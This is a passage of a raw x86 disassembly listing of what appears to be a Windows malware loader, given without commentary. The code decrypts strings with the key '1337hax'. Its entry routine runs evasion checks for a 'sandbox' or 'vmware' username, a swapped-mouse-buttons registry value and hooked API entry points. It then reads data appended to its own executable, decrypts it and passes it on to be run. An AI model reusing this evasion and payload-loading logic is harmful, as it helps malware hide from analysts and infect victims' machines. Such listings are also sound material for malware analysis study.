xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aIlKNcm ; "i+\\Nc"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aIlKNcm ; "i+\\Nc"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aLFgtt ; "}+FGt"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aLFgtt ; "}+FGt"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aHl8geghc ; "h8EGh"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHl8geghc ; "h8EGh"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aHl8@gteIcH ; "h8@Gt͈ch"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHl8@gteIcH ; "h8@Gt͈ch"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aHl8pymuMv ; "h8YMuЌv"
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov edi, eax
mov edx, offset aHl8pymuMv ; "h8YMuЌv"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
pop ebp
retn
sub_40227F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029C0 proc near ; CODE XREF: sub_402E94+E3�p
; sub_402E94+101�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4029D4
mov eax, [ebp+arg_0]
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029D4: ; CODE XREF: sub_4029C0+D�j
; sub_4029C0+5E�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_402A20
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4029EA: ; CODE XREF: sub_4029C0+55�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4029F9
mov eax, [ebp+arg_0]
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029F9: ; CODE XREF: sub_4029C0+32�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
mov edx, [ebp+var_4]
inc edx
mov [ebp+var_4], edx
mov edx, [ebp+var_8]
inc edx
mov [ebp+var_8], edx
cmp eax, ecx
jz short loc_4029EA
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_4029D4
; ---------------------------------------------------------------------------
loc_402A20: ; CODE XREF: sub_4029C0+1C�j
xor eax, eax
locret_402A22: ; CODE XREF: sub_4029C0+12�j
; sub_4029C0+37�j
leave
retn
sub_4029C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_4016CA+147�p
; sub_4016CA+214�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jnb short loc_402A7A
mov eax, [ebp+var_8]
add eax, [ebp+arg_8]
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
jmp short loc_402A58
; ---------------------------------------------------------------------------
loc_402A51: ; CODE XREF: sub_402A24+52�j
mov eax, [ebp+arg_8]
dec eax
mov [ebp+arg_8], eax
loc_402A58: ; CODE XREF: sub_402A24+2B�j
cmp [ebp+arg_8], 0
jz short loc_402A78
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_402A51
; ---------------------------------------------------------------------------
loc_402A78: ; CODE XREF: sub_402A24+38�j
jmp short loc_402AAB
; ---------------------------------------------------------------------------
loc_402A7A: ; CODE XREF: sub_402A24+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jz short loc_402AAB
jmp short loc_402A8B
; ---------------------------------------------------------------------------
loc_402A84: ; CODE XREF: sub_402A24+85�j
mov eax, [ebp+arg_8]
dec eax
mov [ebp+arg_8], eax
loc_402A8B: ; CODE XREF: sub_402A24+5E�j
cmp [ebp+arg_8], 0
jz short loc_402AAB
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
jmp short loc_402A84
; ---------------------------------------------------------------------------
loc_402AAB: ; CODE XREF: sub_402A24:loc_402A78�j
; sub_402A24+5C�j ...
mov eax, [ebp+arg_0]
leave
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AB0 proc near ; CODE XREF: start:loc_4030E1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, dword_4031D4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402AD2
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402ADA
loc_402AD2: ; CODE XREF: sub_402AB0+15�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402ADA: ; CODE XREF: sub_402AB0+20�j
mov eax, dword_4031B4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402AF8
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402B00
loc_402AF8: ; CODE XREF: sub_402AB0+3B�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402B00: ; CODE XREF: sub_402AB0+46�j
mov eax, dword_403188
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402B1E
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402B26
loc_402B1E: ; CODE XREF: sub_402AB0+61�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402B26: ; CODE XREF: sub_402AB0+6C�j
mov eax, dword_40318C
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402B44
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402B4C
loc_402B44: ; CODE XREF: sub_402AB0+87�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402B4C: ; CODE XREF: sub_402AB0+92�j
mov eax, dword_40319C
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402B6A
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402B72
loc_402B6A: ; CODE XREF: sub_402AB0+AD�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402B72: ; CODE XREF: sub_402AB0+B8�j
mov eax, dword_403180
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402B90
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402B98
loc_402B90: ; CODE XREF: sub_402AB0+D3�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402B98: ; CODE XREF: sub_402AB0+DE�j
mov eax, dword_4031A0
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402BB6
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402BBE
loc_402BB6: ; CODE XREF: sub_402AB0+F9�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402BBE: ; CODE XREF: sub_402AB0+104�j
mov eax, dword_4031A8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402BDC
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402BE4
loc_402BDC: ; CODE XREF: sub_402AB0+11F�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402BE4: ; CODE XREF: sub_402AB0+12A�j
mov eax, dword_4031B0
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402C02
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402C0A
loc_402C02: ; CODE XREF: sub_402AB0+145�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402C0A: ; CODE XREF: sub_402AB0+150�j
mov eax, dword_4031D8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402C28
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402C30
loc_402C28: ; CODE XREF: sub_402AB0+16B�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402C30: ; CODE XREF: sub_402AB0+176�j
mov eax, dword_4031CC
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402C4E
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402C56
loc_402C4E: ; CODE XREF: sub_402AB0+191�j
push 1
pop eax
jmp locret_402CE4
; ---------------------------------------------------------------------------
loc_402C56: ; CODE XREF: sub_402AB0+19C�j
mov eax, dword_4031C4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402C74
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402C79
loc_402C74: ; CODE XREF: sub_402AB0+1B7�j
push 1
pop eax
jmp short locret_402CE4
; ---------------------------------------------------------------------------
loc_402C79: ; CODE XREF: sub_402AB0+1C2�j
mov eax, dword_403184
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402C97
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402C9C
loc_402C97: ; CODE XREF: sub_402AB0+1DA�j
push 1
pop eax
jmp short locret_402CE4
; ---------------------------------------------------------------------------
loc_402C9C: ; CODE XREF: sub_402AB0+1E5�j
mov eax, dword_4031E8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402CBA
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402CBF
loc_402CBA: ; CODE XREF: sub_402AB0+1FD�j
push 1
pop eax
jmp short locret_402CE4
; ---------------------------------------------------------------------------
loc_402CBF: ; CODE XREF: sub_402AB0+208�j
mov eax, dword_4031AC
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE8h
jz short loc_402CDD
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 0FFFFFFE9h
jnz short loc_402CE2
loc_402CDD: ; CODE XREF: sub_402AB0+220�j
push 1
pop eax
jmp short locret_402CE4
; ---------------------------------------------------------------------------
loc_402CE2: ; CODE XREF: sub_402AB0+22B�j
xor eax, eax
locret_402CE4: ; CODE XREF: sub_402AB0+25�j
; sub_402AB0+4B�j ...
leave
retn
sub_402AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CE6 proc near ; CODE XREF: start+9A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
hObject = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
and [ebp+var_18], 0
and [ebp+var_4], 0
push 0 ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
mov [ebp+hObject], eax
mov eax, [ebp+hObject]
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax+3Ch]
mov ecx, [ebp+hObject]
lea eax, [ecx+eax+4]
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
add eax, 14h
mov [ebp+var_24], eax
mov eax, [ebp+var_20]
movzx eax, word ptr [eax+10h]
mov ecx, [ebp+var_24]
add ecx, eax
mov [ebp+var_1C], ecx
mov eax, [ebp+var_20]
movzx eax, word ptr [eax+2]
dec eax
imul eax, 28h
mov ecx, [ebp+var_20]
movzx ecx, word ptr [ecx+2]
dec ecx
imul ecx, 28h
mov edx, [ebp+var_1C]
mov eax, [edx+eax+10h]
mov edx, [ebp+var_1C]
add eax, [edx+ecx+14h]
mov [ebp+var_10], eax
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
push 0 ; dwErrCode
call SetLastError
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push [ebp+arg_0]
call dword_4031B8
mov [ebp+var_2C], eax
call GetLastError
test eax, eax
jnz short loc_402D93
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_402D97
loc_402D93: ; CODE XREF: sub_402CE6+A5�j
xor al, al
jmp short locret_402E0B
; ---------------------------------------------------------------------------
loc_402D97: ; CODE XREF: sub_402CE6+AB�j
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call dword_4031C0
mov eax, [ebp+var_28]
cmp eax, [ebp+var_10]
jbe short loc_402DFF
mov eax, [ebp+var_28]
sub eax, [ebp+var_10]
mov [ebp+var_18], eax
push 1
mov eax, [ebp+var_18]
inc eax
push eax
call sub_4012B0
pop ecx
pop ecx
mov [ebp+var_14], eax
push 0
push 0
push [ebp+var_10]
push [ebp+var_2C]
call dword_4031EC
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_18]
push [ebp+var_14]
push [ebp+var_2C]
call dword_4031A4
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_14]
mov [eax], ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_18]
mov [eax], ecx
mov [ebp+var_4], 1
loc_402DFF: ; CODE XREF: sub_402CE6+C4�j
push [ebp+var_2C] ; hObject
call CloseHandle ; CloseHandle
mov al, [ebp+var_4]
locret_402E0B: ; CODE XREF: sub_402CE6+AF�j
leave
retn
sub_402CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E0D proc near ; CODE XREF: sub_402E94+DC�p
; sub_402E94+FA�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
push 1
mov eax, [ebp+var_8]
inc eax
push eax
call sub_4012B0
pop ecx
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_402E42
; ---------------------------------------------------------------------------
loc_402E3B: ; CODE XREF: sub_402E0D:loc_402E8C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_402E42: ; CODE XREF: sub_402E0D+2C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_402E8E
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jl short loc_402E7C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ah
jg short loc_402E7C
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
add eax, 20h
mov ecx, [ebp+var_C]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_402E8C
; ---------------------------------------------------------------------------
loc_402E7C: ; CODE XREF: sub_402E0D+49�j
; sub_402E0D+57�j
mov eax, [ebp+var_C]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
mov [eax], cl
loc_402E8C: ; CODE XREF: sub_402E0D+6D�j
jmp short loc_402E3B
; ---------------------------------------------------------------------------
loc_402E8E: ; CODE XREF: sub_402E0D+3B�j
mov eax, [ebp+var_C]
pop edi
leave
retn
sub_402E0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E94 proc near ; CODE XREF: start:loc_4030CE�p
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_112 = byte ptr -112h
var_111 = byte ptr -111h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 11Ch
push edi
mov [ebp+var_108], 104h
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_104]
push eax
call dword_4031DC
mov [ebp+var_10C], offset aCurrentuser ; "CurrentUser"
lea eax, [ebp+var_104]
mov [ebp+var_110], eax
loc_402EE9: ; CODE XREF: sub_402E94+A5�j
mov eax, [ebp+var_110]
mov al, [eax]
mov [ebp+var_111], al
mov ecx, [ebp+var_10C]
cmp al, [ecx]
jnz short loc_402F44
cmp [ebp+var_111], 0
jz short loc_402F3B
mov eax, [ebp+var_110]
mov al, [eax+1]
mov [ebp+var_112], al
mov ecx, [ebp+var_10C]
cmp al, [ecx+1]
jnz short loc_402F44
add [ebp+var_110], 2
add [ebp+var_10C], 2
cmp [ebp+var_112], 0
jnz short loc_402EE9
loc_402F3B: ; CODE XREF: sub_402E94+74�j
and [ebp+var_118], 0
jmp short loc_402F4F
; ---------------------------------------------------------------------------
loc_402F44: ; CODE XREF: sub_402E94+6B�j
; sub_402E94+8E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_118], eax
loc_402F4F: ; CODE XREF: sub_402E94+AE�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
cmp [ebp+var_11C], 0
jz short loc_402FA0
push offset aSandbox ; "sandbox"
lea eax, [ebp+var_104]
push eax
call sub_402E0D
pop ecx
push eax
call sub_4029C0
pop ecx
pop ecx
test eax, eax
jnz short loc_402FA0
push offset aVmware ; "vmware"
lea eax, [ebp+var_104]
push eax
call sub_402E0D
pop ecx
push eax
call sub_4029C0
pop ecx
pop ecx
test eax, eax
jz short loc_402FA4
loc_402FA0: ; CODE XREF: sub_402E94+CE�j
; sub_402E94+EC�j
mov al, 1
jmp short loc_402FA6
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402E94+10A�j
xor al, al
loc_402FA6: ; CODE XREF: sub_402E94+10E�j
pop edi
leave
retn
sub_402E94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FA9 proc near ; CODE XREF: start:loc_4030BB�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push edi
and [ebp+var_24], 0
push 7
pop ecx
xor eax, eax
lea edi, [ebp+var_23]
rep stosd
stosw
stosb
mov [ebp+var_2C], 1Fh
mov [ebp+var_4], 1
mov [ebp+var_28], 1
lea eax, [ebp+var_30]
push eax
push offset aControlPanelMo ; "Control Panel\\Mouse"
push 80000001h
call dword_4031D0
test eax, eax
jnz loc_403077
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push offset aSwapmousebutto ; "SwapMouseButtons"
push [ebp+var_30]
call dword_403198
test eax, eax
jnz short loc_40306E
mov [ebp+var_34], offset a0 ; "0"
lea eax, [ebp+var_24]
mov [ebp+var_38], eax
loc_40301C: ; CODE XREF: sub_402FA9+A5�j
mov eax, [ebp+var_38]
mov al, [eax]
mov [ebp+var_39], al
mov ecx, [ebp+var_34]
cmp al, [ecx]
jnz short loc_403056
cmp [ebp+var_39], 0
jz short loc_403050
mov eax, [ebp+var_38]
mov al, [eax+1]
mov [ebp+var_3A], al
mov ecx, [ebp+var_34]
cmp al, [ecx+1]
jnz short loc_403056
add [ebp+var_38], 2
add [ebp+var_34], 2
cmp [ebp+var_3A], 0
jnz short loc_40301C
loc_403050: ; CODE XREF: sub_402FA9+86�j
and [ebp+var_40], 0
jmp short loc_40305E
; ---------------------------------------------------------------------------
loc_403056: ; CODE XREF: sub_402FA9+80�j
; sub_402FA9+97�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_40], eax
loc_40305E: ; CODE XREF: sub_402FA9+AB�j
mov eax, [ebp+var_40]
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jnz short loc_40306E
and [ebp+var_28], 0
loc_40306E: ; CODE XREF: sub_402FA9+64�j
; sub_402FA9+BF�j
push [ebp+var_30]
call dword_4031E0
loc_403077: ; CODE XREF: sub_402FA9+40�j
mov al, [ebp+var_28]
pop edi
leave
retn
sub_402FA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push edi
and [ebp+var_10C], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
stosw
stosb
and [ebp+var_8], 0
call sub_40227F
call sub_401EBA
movzx eax, al
test eax, eax
jnz short loc_4030BB
or eax, 0FFFFFFFFh
jmp loc_403176
; ---------------------------------------------------------------------------
loc_4030BB: ; CODE XREF: start+34�j
call sub_402FA9
movzx eax, al
test eax, eax
jz short loc_4030CE
xor eax, eax
jmp loc_403176
; ---------------------------------------------------------------------------
loc_4030CE: ; CODE XREF: start+48�j
call sub_402E94
movzx eax, al
test eax, eax
jz short loc_4030E1
xor eax, eax
jmp loc_403176
; ---------------------------------------------------------------------------
loc_4030E1: ; CODE XREF: start+5B�j
call sub_402AB0
test eax, eax
jz short loc_4030F1
xor eax, eax
jmp loc_403176
; ---------------------------------------------------------------------------
loc_4030F1: ; CODE XREF: start+6B�j
push 104h
lea eax, [ebp+var_10C]
push eax
push 0
call dword_4031B4
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
call sub_402CE6
add esp, 0Ch
movzx eax, al
test eax, eax
jz short loc_403174
push [ebp+var_114]
push [ebp+var_4]
push offset a1337hax ; "1337hax"
call sub_4012F6
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_110]
push eax
push [ebp+var_114]
push [ebp+var_4]
call sub_401518
add esp, 0Ch
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
push eax ; int
push offset String2 ; lpString2
push [ebp+var_110] ; int
push [ebp+var_4] ; int
call sub_401E5B
add esp, 10h
loc_403174: ; CODE XREF: start+A7�j
xor eax, eax
loc_403176: ; CODE XREF: start+39�j start+4C�j ...
pop edi
leave
retn
start endp
; ---------------------------------------------------------------------------
align 4
dword_40317C dd 0 ; sub_401EBA+1BA�w ...
dword_403180 dd 0 ; sub_401EBA+B0�w ...
dword_403184 dd 0 ; sub_401BD6+22C�r ...
dword_403188 dd 0 ; sub_401EBA+77�w ...
dword_40318C dd 0 ; sub_401EBA+8A�w ...
dword_403190 dd 0 ; sub_401EBA+1CD�w ...
dword_403194 dd 0 ; sub_401EBA+348�r
dword_403198 dd 0 ; sub_401EBA+3A2�r ...
dword_40319C dd 0 ; sub_401EBA+9D�w ...
dword_4031A0 dd 0 ; sub_401EBA+C3�w ...
dword_4031A4 dd 0 ; sub_401EBA+375�r ...
dword_4031A8 dd 0 ; sub_401EBA+D6�w ...
dword_4031AC dd 0 ; sub_401EBA+15B�w ...
dword_4031B0 dd 0 ; sub_401EBA+E9�w ...
dword_4031B4 dd 0 ; sub_401EBA+64�w ...
dword_4031B8 dd 0 ; sub_401EBA+36C�r ...
dword_4031BC dd 0 ; sub_401EBA+33F�r
dword_4031C0 dd 0 ; sub_401EBA+387�r ...
dword_4031C4 dd 0 ; sub_401EBA+122�w ...
dword_4031C8 dd 0 ; sub_401EBA+351�r
dword_4031CC dd 0 ; sub_401EBA+10F�w ...
dword_4031D0 dd 0 ; sub_401EBA+399�r ...
dword_4031D4 dd 0 ; sub_401BD6+FA�r ...
dword_4031D8 dd 0 ; sub_401BD6+1AF�r ...
dword_4031DC dd 0 ; sub_401EBA+390�r ...
dword_4031E0 dd 0 ; sub_401EBA+3AB�r ...
dword_4031E4 dd 0 ; sub_401EBA+336�r
dword_4031E8 dd 0 ; sub_401BD6+24F�r ...
dword_4031EC dd 0 ; sub_401EBA+37E�r ...
dword_4031F0 dd 0 ; sub_401EBA+3E�w ...
; char String2[]
String2 dd 0 ; DATA XREF: start+E1�o
dd 3220h, 2 dup(0)
dd 32E6h, 1000h, 5 dup(0)
dd 324Ch, 325Ah, 3268h, 3274h, 3284h, 3292h, 32A4h, 32B8h
dd 32C8h, 32D8h, 0
dd 6C4701F8h, 6C61626Fh, 6F6C6C41h, 1FF0063h, 626F6C47h
dd 72466C61h, 6565h, 736C03BDh, 61637274h, 4174h, 6F4C0252h
dd 694C6461h, 72617262h, 4179h, 724600F8h, 694C6565h, 72617262h
dd 1A00079h, 50746547h, 41636F72h, 65726464h, 7373h, 6547017Fh
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470171h, 73614C74h
dd 72724574h, 726Fh, 65530328h, 73614C74h, 72724574h, 726Fh
dd 6C430034h, 4865736Fh, 6C646E61h, 454B0065h, 4C454E52h
dd 642E3233h, 6C6Ch, 43h dup(0)
_data ends
end start